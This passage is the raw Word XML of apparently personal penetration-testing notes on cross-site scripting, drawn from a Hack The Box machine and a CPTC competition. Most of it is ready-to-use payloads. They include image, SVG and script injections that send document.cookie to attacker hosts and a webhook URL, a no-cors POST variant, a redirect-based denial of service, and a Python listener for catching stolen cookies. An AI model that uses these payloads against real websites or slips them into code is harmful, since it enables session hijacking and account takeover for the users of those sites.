    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="x" onerror="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="x" onerror="fetch('http://your-attack-server.com/log?cookies=' + document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to steal a cookie using the img method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload="alert('XSS')"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script Image method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.14.41:5000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/?cookie="+btoa(document.cookie); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Headless HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the IP and PORT with your own IP and port, or the web hook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From CPTC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=1 onerror=fetch("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker-domain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">",{method:'POST',mode:'no-cors',body:document.cookie}); /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one uses a POST request as well as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no-cors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode to bypass cross-origin restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To DoS the posts page, send a post with javascript that redirects the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> window.location </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attribute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.location attribute tells where to redirect to, so we can make it redirect to any malicious website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind XSS to steal Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="https://webhook.site/9d1d1d19-a1e8-43a5-ac45-fb632363f694/?cookie="+btoa(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for web hooks and it uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with your own web hook URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;var i=new Image(); i.src="http://[IP]:[Port]/?cookie="+btoa(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF YOU USE WEBHOOKS, MAKE SURE TO DO https, not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for sending the cookies to your local computer, probably catching via python server or something </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IP]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Port] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with where you are listening. Or if you are using webhook, then just paste in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then use Webhook or set up a python server to listen to request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag in Python stands for module. It tells Python to locate the specified module (in this case, http.server), and run it as a script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple way to steal cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; fetch('http://your-attack-server.com?cookie=' + document.cookie); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL Testing (Reflected XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add payloads in query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://example.com/?q=&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if your payload is executed in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM Testing (DOM-based XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use browser dev tools to inspect JavaScript code and find functions like innerHTML, document.write, or eval() that handle user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject payloads directly into these inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
